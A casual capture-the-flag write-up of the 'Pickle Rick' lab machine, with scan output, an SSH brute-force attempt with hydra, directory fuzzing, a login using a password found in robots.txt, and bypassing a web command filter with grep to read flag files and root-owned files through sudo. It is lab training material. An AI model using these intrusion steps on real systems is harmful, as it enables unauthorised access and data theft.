Contents

1

Pickle Rick

This one was pretty fun due to the theme, but very easy!

Enumeration

rustscan -a $TARGET 
sudo rustscan -a $TARGET --ulimit 5000 -- -A -p-
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan\'s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.123.26:22
Open 10.10.123.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 10:42 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
Initiating Ping Scan at 10:42
Scanning 10.10.123.26 [4 ports]
Completed Ping Scan at 10:42, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:42
Completed Parallel DNS resolution of 1 host. at 10:42, 11.02s elapsed
DNS resolution of 1 IPs took 11.02s. Mode: Async [#: 4, OK: 0, NX: 1, DR: 0, SF: 0, TR: 5, CN: 0]
Initiating SYN Stealth Scan at 10:42
Scanning 10.10.123.26 [2 ports]
Discovered open port 80/tcp on 10.10.123.26
Discovered open port 22/tcp on 10.10.123.26
Completed SYN Stealth Scan at 10:42, 0.15s elapsed (2 total ports)
Initiating Service scan at 10:42
Scanning 2 services on 10.10.123.26
Completed Service scan at 10:42, 6.23s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.123.26
Retrying OS detection (try #2) against 10.10.123.26
Initiating Traceroute at 10:42
Completed Traceroute at 10:42, 3.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:42
Completed Parallel DNS resolution of 2 hosts. at 10:42, 11.01s elapsed
DNS resolution of 2 IPs took 11.01s. Mode: Async [#: 4, OK: 0, NX: 2, DR: 0, SF: 0, TR: 8, CN: 0]
NSE: Script scanning 10.10.123.26.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 3.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.39s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
Nmap scan report for 10.10.123.26
Host is up, received reset ttl 61 (0.096s latency).
Scanned at 2021-08-12 10:42:15 EDT for 39s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d4:9d:0e:6a:6b:78:e6:b2:3d:16:0d:ce:e4:91:48:84 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCw93RMmI6IGRknbNJezP65M9A8Ht6txtsDScjgtKbFc+4Tbas1Hg7lUdi28qujkhgWxgtjabQ6BSGnDe6hNUKveGl5oxZmdzzSNvDcRY6VddaJMosPnn9ZCQl8ipFkcejO5XH3YMN9yBMERdID6rhk+WImLhvsYoWGLZOnQXjv9YJFYXIvl29Xu2SNAOum7YJU2b17x+StPD7JrDPxxO7LlDQ+RhECVS7uGwfKtIOBqeazL4I6d3+6gon0NHu/50RTaUpfJ1PQqxVpwZxe58tiEV7T2NtFQys98YaBEAgaEqxBMmAR2YFjhLLxGRCORxx2qHXVRUah1elIPlEb9L0F
|   256 5f:b2:1e:64:43:cf:27:c1:a6:73:ab:85:ce:67:30:1d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBGBZ1D4LHmpTYu66WSEEkGu/jN12bAV+EYa7XCZlF5K8UFT7mdDuYQCEaMZ1UgUv2+eRMqlzHXl72CFHR/iyHY=
|   256 1b:2b:6c:d6:f9:4d:08:dc:9a:d7:10:e2:e3:58:90:bb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHZBvu1Yj9zOz+yttjF3le0wlw5urrZVzZyjlr9RMtj6
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=8/12%OT=22%CT=%CU=32655%PV=Y%DS=4%DC=T%G=N%TM=6115336E%P=x86_64-pc-linux-gnu)
SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)
OPS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O6=M506ST11)
WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)
ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 200.443 days (since Sat Jan 23 23:04:58 2021)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   28.31 ms 10.6.0.1
2   ... 3
4   94.47 ms 10.10.123.26

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:42
Completed NSE at 10:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.22 seconds
           Raw packets sent: 65 (4.396KB) | Rcvd: 41 (3.068KB)

Note: Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation

nikto --host 10.10.123.26 --port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.123.26
+ Target Hostname:    10.10.123.26
+ Target Port:        80
+ Start Time:         2021-08-12 10:42:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag

Web Service

2
The fist thing I did was look at the html of the index:

curl 10.10.123.26                        
...

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

...

It’s quick to see that we have a username: R1ckRul3s. Now we should probably just start bruteforcing ssh with this username while we continue to poke around:

hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt 10.10.123.26 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-12 10:53:12
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.123.26:22/
[ERROR] target ssh://10.10.123.26:22/ does not support password authentication (method reply 4)

Oh - Sike! There apparently isn’t password authentication!

Let’s try to find some interesting paths then:

dirb http://10.10.123.26                                                                                                                                     255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 12 10:55:28 2021
URL_BASE: http://10.10.123.26/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.123.26/ ----
# Nothing seems useful here
==> DIRECTORY: http://10.10.123.26/assets/
# We already gathered a username from here
+ http://10.10.123.26/index.html (CODE:200|SIZE:1062)
# content: Wubbalubbadubdub
+ http://10.10.123.26/robots.txt (CODE:200|SIZE:17)                                                                                                                   
+ http://10.10.123.26/server-status (CODE:403|SIZE:300)

The only thing I really got from this is that there’s assets that I haven’t found used on a page yet. So I know I’m missing something. Time to move onto the forever useful SecLists to try to pin-point something useful:

dirb http://10.10.212.185 dirb http://10.10.212.185 ./Apache.fuzz.txt
dirb http://10.10.212.185 ./PHP.fuzz.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 12 14:58:45 2021
URL_BASE: http://10.10.212.185/
WORDLIST_FILES: ./PHP.fuzz.txt

-----------------

GENERATED WORDS: 104                                                           

---- Scanning URL: http://10.10.212.185/ ----
+ http://10.10.212.185//login.php (CODE:200|SIZE:882)                                  
                                                                                       
-----------------
END_TIME: Thu Aug 12 14:58:54 2021
DOWNLOADED: 104 - FOUND: 1

Ah here we go, a login page!
3

Login page

Now, we’ve got a few ways we can move forward:
- Assume there’s SQL handling the login and look for injection/bypass
- Brute Force

First I tried just slapping some quotes in and see if I could get SQL errors out, no dice. I then ran through my little list of login bypasses but no dice.

Then of course, i tried the text from the robots.txt file, and it worked hahahahaha! Hilarious.
4

Finding RCE

Well, we have an RCE on the main page. All the other links just say “only the real rick can view these” and it gets denied.
5
Okay so some commands are denied, this is a classic shell escape problem:
6

Shell Escape

Experimentation Table:
- which nc -> /bin/nc
- nc -> (We can probably get a reverse shell, but I tried and couldn’t get it to work so maybe some network filtering going on)
- which cat -> denied usage
- which head -> denied usage
- which tail -> denied usage
- which grep -> /bin/grep (We can use grep to print files!)

From first directory:
Sup3rS3cretPickl3Ingred.txt -> XXXXX

Finding others:
- ls /home -> rick \n ubuntu
- ‘ls -a /home/rick’ -> ‘second ingredients’
- grep ‘^’ /home/rick/‘second ingredients’ -> ‘XXXXX’

Also, we have root from www-data…
7

sudo ls -a /root ->

.
..
.bashrc
.profile
.ssh
3rd.txt
snap

sudo grep '^' /root/3rd.txt -> ‘XXXXX’

Directory
$ cd content && tree